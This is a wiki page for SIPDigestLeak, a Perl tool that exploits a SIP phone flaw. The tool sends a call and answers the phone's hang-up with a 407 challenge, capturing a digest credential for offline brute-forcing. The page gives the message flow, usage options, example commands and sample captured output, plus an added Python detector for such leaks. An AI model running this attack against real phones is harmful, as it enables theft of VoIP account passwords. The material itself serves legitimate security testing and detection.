SIPDigestLeak

Jose Luis Verdeguer edited this page Mar 8, 2019 · 5 revisions

SipDigestLeak exploits the vulnerability discovered by Sandro Gauci that affects a large number of hardware and software devices. The description of the vulnerability is here: https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf

The goal is to place a call to a telephone device with an INVITE message. When someone on the other side answers the call, there is no audio, so he or she hangs up and we receive a BYE message. We then reply with a 407 Proxy Authentication Required. If the telephone device is vulnerable, it responds with another BYE message that includes an authentication response.

With that response we can try to recover the password with a brute-force attack on our local machine.

Script                                                         Phone
      ---> INVITE                                          ---> 
      <--- 100 Trying                                      <---
      <--- 180 Ringing                                     <---
      <--- 200 OK                                          <---
      ---> ACK                                             --->
      <--- BYE                                             <---
      ---> 407 Proxy Authentication Required (with digest) ---> 
      <--- BYE (with digest response)                      <---
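
Seen from the phone's side, the flow above leaves a recognisable trace: a BYE carrying digest credentials goes to a peer that challenged the phone's own BYE and is not the phone's proxy. The Python sketch below is an added example, not part of sipdigestleak.pl or this wiki, and flags that pattern in a message log. The capture, the IP addresses, `TRUSTED_PROXIES` and all function names are constructed assumptions, and the parser ignores compact header forms and folded lines.

```python
import re

TRUSTED_PROXIES = {"192.168.1.10"}  # assumption: the phone's configured proxy

def msg(*lines):
    return "\r\n".join(lines) + "\r\n\r\n"

# Constructed capture seen at the phone: (direction, peer IP, raw SIP message).
SAMPLE = [
    ("out", "192.168.1.50", msg("BYE sip:100@192.168.1.50 SIP/2.0", "Call-ID: a1", "CSeq: 1 BYE")),
    ("in", "192.168.1.50", msg("SIP/2.0 407 Proxy Authentication Required", "Call-ID: a1",
        "CSeq: 1 BYE", 'Proxy-Authenticate: Digest realm="asterisk", nonce="n1"')),
    ("out", "192.168.1.50", msg("BYE sip:100@192.168.1.50 SIP/2.0", "Call-ID: a1", "CSeq: 2 BYE",
        'Proxy-Authorization: Digest username="testuser", realm="asterisk", nonce="n1", '
        'response="' + "0" * 32 + '"')),
    # Same exchange with the trusted proxy: expected behaviour, not reported.
    ("in", "192.168.1.10", msg("SIP/2.0 407 Proxy Authentication Required", "Call-ID: b2",
        "CSeq: 1 BYE", 'Proxy-Authenticate: Digest realm="asterisk", nonce="n2"')),
    ("out", "192.168.1.10", msg("BYE sip:200@192.168.1.10 SIP/2.0", "Call-ID: b2", "CSeq: 2 BYE",
        'Proxy-Authorization: Digest username="testuser", realm="asterisk", nonce="n2", '
        'response="' + "1" * 32 + '"')),
]

def parse(raw):
    """Split a SIP message into its start line and a lower-cased header dict."""
    start, *rest = raw.split("\r\n")
    headers = {}
    for line in rest:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return start, headers

def find_digest_leaks(messages, trusted):
    """Report BYE requests that answer a 401/407 challenge from an untrusted peer."""
    challenged, findings = set(), []
    for direction, peer, raw in messages:
        start, h = parse(raw)
        key = (h.get("call-id"), peer)
        is_bye = h.get("cseq", "").upper().endswith("BYE")
        if direction == "in" and re.match(r"SIP/2\.0 40[17]\b", start) and is_bye:
            challenged.add(key)  # peer challenged a BYE in this dialog
        elif direction == "out" and start.startswith("BYE ") and key in challenged:
            cred = h.get("proxy-authorization") or h.get("authorization")
            if cred and peer not in trusted:
                user = re.search(r'username="([^"]*)"', cred)
                findings.append({"call_id": key[0], "peer": peer,
                                 "username": user.group(1) if user else None})
    return findings
```

Calling `find_digest_leaks(SAMPLE, TRUSTED_PROXIES)` reports only the `a1` dialog; the identical exchange with the trusted proxy in `b2` is left alone.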

Usage

$ perl sipdigestleak.pl

SipDigestLeak - by Pepelux <pepeluxx@gmail.com>
-------------

Usage: perl sipdigestleak.pl -h <host> [options]
 
== Options ==
-f  <string>     = From user (default: 100)
-fn <string>     = From name (default blank)
-t  <string>     = To user (default: 100)
-p  <integer>    = Remote port (default: 5060)
-ip <string>     = Source IP (default: local IP address)
-ua <string>     = Customize the UserAgent
-sd <filename>   = Save data in format of SIPDump file
-v               = Verbose (trace information)
 
== Examples ==
$ perl sipdigestleak.pl -h 192.168.0.1
$ perl sipdigestleak.pl -h 192.168.0.1 -p 5080 -v
$ perl sipdigestleak.pl -h 192.168.0.1 -sd data.txt
$ perl sipdigestleak.pl -h 192.168.0.1 -f 666666666 -fn Devil

Example

$ perl sipdigestleak.pl -h 192.168.1.127
[+] Connecting to 192.168.1.127
[+] Sending INVITE 100 => 100
[-] 100 Trying
[-] 180 Ringing
[-] 200 OK
[+] Sending ACK
[+] Waiting for the BYE message
[-] BYE received
[+] Sending 407 Proxy Authentication Required
[-] Auth: Digest username="testuser", realm="asterisk", nonce="treu3t1u", uri="sip:100@192.168.1.129:58134;transport=udp", response="c903022ba520f48292c24ddb376ba8a4", algorithm=MD5